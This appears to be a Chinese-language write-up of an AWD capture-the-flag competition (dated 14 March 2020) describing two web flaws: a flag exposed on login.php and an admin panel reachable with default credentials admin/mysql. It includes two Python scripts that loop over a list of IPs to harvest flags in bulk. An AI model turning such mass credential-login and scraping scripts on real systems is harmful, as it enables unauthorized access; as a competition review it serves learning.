星盟安全awd复盘20200314
web1
web2
1,直接获取flag
漏洞点:login.php
直接访问页面即可查看flag
直接写一个简单的脚本批量即可:
import requests
import re
f = open("ip.txt","r")
for i in f.readlines():
i = i.strip()
url = "http://"+i+"/login.php"
res = requests.get(url)
if 'flag' in res.text:
pattern = re.compile('<input type="hiddent" value=(.*?)>', re.S)
flag = re.findall(pattern, res.text)
print(flag[0].strip())
2,直接获取flag2
漏洞点:admin/index.php
当以admin用户登录时,后台会直接显示flag:
继续批量:因为太晚改了略改了下队友的exp,不是我写exp的风格。
import requests
import re
f = open('ip.txt','r')
data = {
'username': 'admin',
'password': 'mysql'
}
for i in f.readlines():
i = i.strip()
url = "http://" + i
s = requests.Session()
s.post(url + "/login.php", data=data)
r = s.get(url + '/admin/index.php')
if 'flag' in r.text:
pattern = re.compile('(.*)<h2>', re.S)
flag = re.findall(pattern, r.text)
print(flag[0].strip())
太晚了,明天继续。